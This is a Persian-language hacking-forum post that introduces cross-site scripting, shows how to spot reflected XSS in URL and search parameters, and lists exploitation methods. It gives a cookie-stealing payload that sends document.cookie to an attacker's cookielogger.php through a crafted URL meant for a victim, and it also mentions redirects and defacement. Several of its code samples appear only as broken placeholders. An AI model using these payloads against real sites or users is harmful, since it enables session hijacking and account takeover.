برا تو
برا تو

امتیاز موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5

[-]
کلمات کلیدی
xss یا css چیست؟

Xss یا Css چیست؟
#1
Xss یا Css چیست؟
 این حملات که به HTML injecting یا غالبا Cross Stie Scripting معروف هستند , به معنی نوشتن کد کنار صفحات اصلی سایت هستند. و چون مخفف Css می باشد غالبا با Cascading Style Sheets اشتباه گرفته میشن, به همین دلیل متخصصین کامپیوتر به آن عنوان Xss دادند که اشتباهی صورت نگیرد.

* نکته : اغلب Xss زمانی رخ میدهد که سایت از نظر آدرس دهی به خوبی بسته نشده باشد, که در این حالت میتوان یه سری کدهای HTML را تزریق نمود. Xss معمولا در آدرس سایت یا یک باکس رخ میدهد مثل باکس سرچ و ...

برای مثال به دو کد زیر در صفحه ی http://site/welcome.php یک سایت توجه کنید:
[undefined=undefined]
in php:

[/undefined]

[undefined]
in asp:

[undefined/]

اگر بجای متغییر name هد رو بزاریم user و به این صورت دربیاد http://site/welcome.php?name=user مرورگر پس از ترجمه و تفسیر یه چنین چیزی رو به ما میده:

[undefined=undefined]welcome ; user[/undefined]

اگه دقت بفرمایید ما می توانیم به وسیله ی این ضعف در برنامه نویسی کدهای خودمون رو تزریق کنیم! حالا چطوری؟ بریم فصل دوم!

_ پیدا کردن و اکسپلویت کردن باگ :

خب! یه جورایی شما یاد گرفتید که چگونه باگ رو پیدا کنید. اما روش دیگری برای پیدا کردن باگ که اغلب در قسمت search سایت پیدا میشه به این صورت است:
برید در قسمت search سایت و یک کلمه را به دلخواه تایپ کنید. در انتها آدرس مثلا به چنین چیزی تبدیل میشه:

[undefined=undefined]http://site/search.php?word=BlackHat[/undefined]

در این آدرس ما دنبال کلمه ی BlackHat بودیم. خب اگه به چنین چیزی برخوردین , احتمال بدید که این سایت باگ Xss داره. و کافیه با روش های پایین آن را exploit کنید.

* نکته : در صفحات ASP قابلیتی برای از بین بردن این باگ وجود دارد , که در قسمت بعدی مقاله توضیح میدم.
* نکته : اگه سایت آسیب پذیری زیادی داشته باشه میشه اونو Full deface کرد.

مهمترین روش های exploit این باگ عبارتند از:

در exploit باگ Xss اغلب ما کدهای JavaScript و HTML رو که مرورگر میتونه اون ها رو ترجمه کنه تزریق میکنیم. اما نمیشه کدهای php رو تزریق کنیم , دلیلش هم اینه که وظیفه ی ترجمه ی این نوع کدها به عهده ی ترجمه گر سرور است نه کلاینت.
- برای این کار سه روش وجود دارد:

1 - استفاده از Xss برای کلاینت Hacking (روش دزدیدن کوکی ها)
در این روش ما با Redirect کردن صفحه به سمت کوکی گرابر خودمون کوکی رو میدزدیم و اون رو روی مرورگر خودمون set میکنیم و به راحتی user طرف رو هک میکنیم. (ابزارهای زیادی برای دزدیدن کوکی ساخته شده اند) خب حالا به کد زید توجه کنید:

[undefined=undefined]Windows.location = "Address of cookielogger.php?c="+document.cookie[/undefined]

مثلا میشه چنین چیزی:

[undefined=undefined]http://site/search.php?word=Windows.location = "http://localhost/cookielogger.php?c="+document.cookie[/undefined]

خب اینو میدیم به قربانی بعد تمام کوکی اون save میشه داخل پوشه و ...

2 - Redirecting
این روش کد خاصی نمی خواد فقط باید ادامه ی قسمت آسیب پذیرآدرس سایتی رو بنویسید که میخواید بره اونجا , شما میتوانید با این روش آدرس یه اسکریپت رو بفرستید.

3 - نمایش یک Alert
[undefined=undefined]
alert('Xss');
[/undefined]
اگر این کد رو به url آسیب پذیر بدید یک پیغام با محتوای Xss بالا میاد.
کدهای زیادی را میتوانید تزریق بکنید که نیاز به دانستن JavaScript و HTML است.

Telegram ID:@mamad_arty_boy_bdh
محمدرضا نوری
mohammad reza noori



[عکس: photo_2016_01_12_22_14_36.jpg]
برای تشکر از نویسنده روی سپاس کلیک کنید
پاسخ }}}}
سپاس شده توسط: DANYAL_PISHRO ، سعید اچ ام پی


پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان